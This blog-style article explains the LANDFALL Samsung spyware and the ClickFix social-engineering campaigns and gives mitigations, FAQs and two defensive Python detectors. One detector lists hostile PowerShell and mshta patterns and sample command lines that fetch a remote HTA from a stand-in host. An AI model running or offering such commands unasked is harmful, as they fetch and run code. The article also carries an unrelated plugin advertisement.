Why LANDFALL Android malware and ClickFix social-engineering malware campaigns matter

Emerging Threats: LANDFALL and ClickFix Malware Campaigns

LANDFALL Android malware and ClickFix social-engineering malware campaigns have emerged as urgent threats to mobile and web security. These campaigns exploited image processing flaws and social tricks to bypass defenses.

Researchers tracked LANDFALL, which used malicious DNG image files to trigger code execution on Samsung devices. Because the exploit could enable zero-click remote code execution, the risk to targets rose dramatically. ClickFix, by contrast, used convincing prompts and PowerShell or mshta techniques to lure users into running commands themselves. As a result, organizations face both technical exploits and human-focused deception.

LANDFALL collected microphone audio, contacts, messages, and precise locations. Meanwhile ClickFix prioritized credential theft, browser manipulation, and cache smuggling for persistence. Both operations used evasion and living off the land binaries to avoid detection.

Therefore defenders cannot rely on a single security layer anymore. Instead teams must harden firmware, update apps, and train users on social engineering. This article explains the tactics, indicators, and mitigation steps in clear terms.

It also links related vulnerabilities such as CVE-2025-21042 and CVE-2025-21043 for context. Ultimately understanding these campaigns helps security teams close gaps and reduce exposure.

LANDFALL Android malware and ClickFix social engineering malware campaigns explained

LANDFALL is a precision Android spyware campaign that exploited Samsung image processing flaws. Researchers observed specially crafted DNG image files delivered over messaging apps such as WhatsApp. Because the exploit targeted Samsung's libimagecodec.quram.so library, it enabled remote code execution while the image was being processed. Unit 42 tracked LANDFALL as CL-UNK-1054 and documented zero-click behaviors. For more technical details see Unit 42 Global Incident Response Report.

Attack methods

  • Vector delivery using malicious DNG image files that looked normal in chats.
  • Zero-click exploitation of CVE-2025-21042 and later CVE-2025-21043 in Samsung firmware.
  • Loader components such as a Bridge Head module that fetches b.so and talks to a C2 server over HTTPS on ephemeral ports.
  • Evasion through debugger detection and anti-analysis checks.

Targets and impact

  • Primary targets included Samsung Galaxy S22 through S24, Z Fold4 and Z Flip4 devices.
  • Capabilities included microphone recording, call interception, location tracking, and data exfiltration like photos and messages.
  • Six samples appeared on VirusTotal between July 2024 and February 2025, and Samsung patched the flaws in April and September 2025.
  • The campaign's tooling and infrastructure resembled known Middle East surveillance operations, with markers linked to Stealth Falcon and Variston. For coverage see The Hacker News and TechCrunch.

ClickFix is a separate social engineering focused campaign. It uses malvertising, SEO poisoning and browser prompts to trick users into running commands. Attackers leverage living off the land binaries like PowerShell and mshta for persistence. As a result defenders must combine firmware updates, browser hardening and user training to reduce risk.


LANDFALL Android malware and ClickFix social-engineering malware campaigns comparison

Below is a concise comparison of the two campaigns. It highlights vectors, targets, impact, detection difficulty and mitigations. Therefore security teams can quickly grasp differences and plan defenses.

Attack Vector
  • LANDFALL Android spyware: malicious DNG image files delivered via messaging apps; exploits the image processing library during rendering.
  • ClickFix social engineering malware: malvertising, SEO poisoning and deceptive browser prompts; lures users into running commands.

Target Devices
  • LANDFALL Android spyware: Samsung Galaxy S22, S23 and S24 series and Z Fold4 and Z Flip4; devices with libimagecodec.quram.so.
  • ClickFix social engineering malware: broad desktop and mobile browsers; Windows endpoints that run PowerShell or mshta.

Impact
  • LANDFALL Android spyware: remote code execution, microphone recording, call interception, location tracking, data exfiltration.
  • ClickFix social engineering malware: credential theft, browser manipulation, cache smuggling, persistence via living off the land binaries.

Detection Difficulty
  • LANDFALL Android spyware: high because of the zero-click exploit and anti-analysis measures; stealthy C2 over HTTPS.
  • ClickFix social engineering malware: moderate to high because of social tricks and use of native binaries; activity can blend in with normal administration.

Mitigation Strategies
  • LANDFALL Android spyware: patch firmware and apps immediately, use advanced threat prevention, block malicious image parsing, employ behavioral EDR.
  • ClickFix social engineering malware: harden browsers, block malvertising, train users, restrict execution of PowerShell and mshta, enable DNS and URL filtering.

Mitigation for LANDFALL Android malware and ClickFix social-engineering malware campaigns

Patch devices and apps as soon as updates become available. For example Samsung fixed CVE-2025-21042 and CVE-2025-21043, and WhatsApp and Apple released related patches. Because firmware fixes remove the underlying vulnerability, update at scale using mobile device management. Also disable automatic image downloads in messaging apps to reduce exposure to malicious DNG files. Use strict app permissions, and review microphone, camera, and location access regularly.

Use layered detection and prevention. Deploy behavioral endpoint detection and response, and enable network monitoring to flag unusual HTTPS connections to unknown hosts. In addition apply advanced URL and DNS filtering to block malvertising and SEO poisoning. For technical context and indicators see Unit 42 research at Unit 42 Global Incident Response Report and vulnerability details at CVE-2025-21042. Meanwhile TechCrunch provides a useful overview of the LANDFALL exploit at TechCrunch Overview.
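The network monitoring step above can be turned into a concrete check. The following is an added example, not code from the article or from Unit 42: a small heuristic that flags outbound TLS connections from a managed device to hosts outside an allow list when they use an ephemeral destination port (the C2 pattern described for the LANDFALL loader) or carry an unusually large upload. The record format, the allow list and every sample connection are constructed for illustration.

```python
# Added example: heuristic for LANDFALL-style C2 traffic in outbound
# connection records (e.g. from a proxy, NDR sensor or mobile VPN gateway).
# All hosts, devices and thresholds below are constructed, not real IoCs.
from dataclasses import dataclass

EPHEMERAL_MIN = 32768           # Linux/IANA ephemeral port range starts here
UPLOAD_THRESHOLD = 5_000_000    # bytes out; audio/photo exfiltration is bulky
ALLOWED_HOSTS = {               # constructed list of expected infrastructure
    "mdm.example.invalid",
    "updates.example.invalid",
}

@dataclass
class Conn:
    device: str
    dst_host: str
    dst_port: int
    proto: str       # "tls" for HTTPS-style traffic as seen by the sensor
    bytes_out: int

def is_suspicious(c: Conn) -> bool:
    """TLS to an unknown host on an ephemeral port, or with a large upload."""
    if c.proto != "tls" or c.dst_host in ALLOWED_HOSTS:
        return False
    return c.dst_port >= EPHEMERAL_MIN or c.bytes_out >= UPLOAD_THRESHOLD

def flag_c2_candidates(conns: list[Conn]) -> list[str]:
    """One summary line per suspicious connection, sorted by device and port."""
    hits = sorted((c for c in conns if is_suspicious(c)),
                  key=lambda c: (c.device, c.dst_port))
    return [f"{c.device} -> {c.dst_host}:{c.dst_port} ({c.bytes_out} B out)"
            for c in hits]

# Constructed sample traffic: routine MDM/update checks, one small session
# to an unknown host on 443 (benign-looking), one TLS session to an unknown
# host on a high port, and one bulk upload to an unknown host on 443.
SAMPLE = [
    Conn("galaxy-s23-017", "mdm.example.invalid", 443, "tls", 2048),
    Conn("galaxy-s23-017", "updates.example.invalid", 443, "tls", 512),
    Conn("galaxy-s23-017", "198.51.100.7", 443, "tls", 3000),
    Conn("galaxy-s23-017", "203.0.113.45", 48122, "tls", 918_000),
    Conn("fold4-004", "203.0.113.45", 443, "tls", 12_000_000),
]

if __name__ == "__main__":
    for line in flag_c2_candidates(SAMPLE):
        print("C2 candidate:", line)
```

The allow list is the weak point of this heuristic: an unknown host on port 443 with a modest upload is not flagged, so pair it with periodic review of new destinations on standard ports.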

Harden endpoints and servers. Restrict execution of PowerShell and mshta through application control, and use AppLocker or similar allow lists on Windows. Also remove unnecessary local administrator rights, and enforce multifactor authentication everywhere possible. Train staff with realistic phishing and social engineering simulations. As a result users will recognize deceptive prompts, and they will be less likely to run harmful commands.
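Application control stops PowerShell and mshta from running; where that is not possible everywhere, a detection rule for the ClickFix execution pattern helps. The following is an added example, not code from the article: it classifies process-creation events in which a browser or the Windows shell (the Run dialog is explorer.exe) spawns PowerShell or mshta with flags typical of a pasted lure command. The event fields and all sample events are constructed; real Sysmon Event ID 1 or EDR telemetry would be mapped onto the same three fields.

```python
# Added example: ClickFix-style detection over constructed process-creation
# events. Flags a LOLBin launched from a lure-capable parent together with
# at least one suspicious argument, or two suspicious arguments on their own.
import re
from dataclasses import dataclass

LURE_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "explorer.exe"}
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

# Argument patterns common in user-pasted commands: hidden window, bypassed
# execution policy, base64-encoded command, mshta fetching a remote HTA.
SUSPICIOUS_ARGS = [
    ("hidden window", re.compile(r"(?i)-w(indowstyle)?\s+hidden")),
    ("execution policy bypass", re.compile(r"(?i)-e(xecutionpolicy|p)\s+bypass")),
    ("encoded command", re.compile(r"(?i)-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}")),
    ("mshta remote HTA", re.compile(r"(?i)^mshta(\.exe)?\s+https?://")),
]

@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> list[str]:
    """Return the reasons an event looks like ClickFix execution, or []."""
    image = _basename(ev.image)
    if image not in LOLBINS:
        return []
    reasons = []
    parent = _basename(ev.parent_image)
    if parent in LURE_PARENTS:
        reasons.append(f"{image} spawned by {parent}")
    reasons += [label for label, rx in SUSPICIOUS_ARGS if rx.search(ev.command_line)]
    # One signal alone (e.g. an admin's -ep bypass script) is too noisy.
    return reasons if len(reasons) >= 2 else []

# Constructed sample events; the base64 blob decodes to harmless text.
SAMPLE = [
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -ep bypass -enc aGVsbG8gd29ybGQgZnJvbSB0aGUgbHVyZQ=="),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://lure.example.invalid/update.hta"),
    ProcEvent(r"C:\Users\dev\code.exe", r"C:\Program Files\PowerShell\7\pwsh.exe",
              "pwsh.exe -NoProfile -File build.ps1"),
    ProcEvent(r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ep bypass -File C:\scripts\inventory.ps1"),
]

if __name__ == "__main__":
    for ev in SAMPLE:
        if reasons := classify(ev):
            print("ClickFix candidate:", ev.command_line, "|", "; ".join(reasons))
```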

Operational best practices

Maintain secure logging and sufficient retention so analysts can investigate post-incident. Test incident response playbooks and run tabletop exercises regularly. Finally subscribe to vendor advisories and threat feeds, because timely intelligence shortens remediation windows.

Conclusion

Awareness of LANDFALL Android malware and ClickFix social-engineering malware campaigns remains essential for defenders. These threats combine technical zero-click exploits and human trickery. Therefore organizations must patch promptly, enforce layered defenses, and train staff. As a result, teams reduce exposure and detection time.

Velocity Plugins offers AI driven WooCommerce plugins such as Velocity Chat that help commerce teams. In particular Velocity Chat improves conversion rates and reduces support costs by automating replies. For more information visit Velocity Plugins. Ultimately combining threat awareness with practical tooling strengthens both security and business resilience.

Moreover Velocity Chat integrates with WooCommerce workflows to route queries and collect customer signals. Therefore teams cut manual work and gain analytics to improve conversion and support efficiency. Finally stay vigilant and subscribe to vendor advisories for timely patches.

Frequently Asked Questions (FAQs)

Q1 What are LANDFALL and ClickFix and why do they matter?

LANDFALL Android malware and ClickFix social engineering malware campaigns combine technical exploits and human tricks. LANDFALL abused DNG image processing to run code without user action. ClickFix uses deceptive prompts and malvertising to convince users to run commands. Therefore both campaigns show attackers can bypass single controls.

Q2 How can I tell if a device is infected?

Look for unusual battery drain, microphone noise, or apps you did not install. Also watch for unexpected data transfers and unknown HTTPS connections. However these signs are subtle with advanced spyware, so use behavioral EDR and network logs for better detection.

Q3 I have a Samsung phone. What immediate steps should I take?

First install vendor updates and security patches right away. For details on the relevant vulnerability see CVE-2025-21042. In addition disable automatic image downloads in messaging apps and review app permissions.

Q4 How can I reduce risk from ClickFix style attacks?

Train users to ignore unexpected prompts and unsolicited downloads. Block malvertising and apply DNS and URL filtering at the network edge. Also restrict PowerShell and mshta and use application allow lists.

Q5 What should organizations change in their security posture?

Adopt layered defenses including patch management, behavioral EDR, and advanced URL filtering. Use threat intelligence and run tabletop exercises to shorten response time. For research and indicators consult Unit 42. As a result teams will reduce exposure and improve detection.
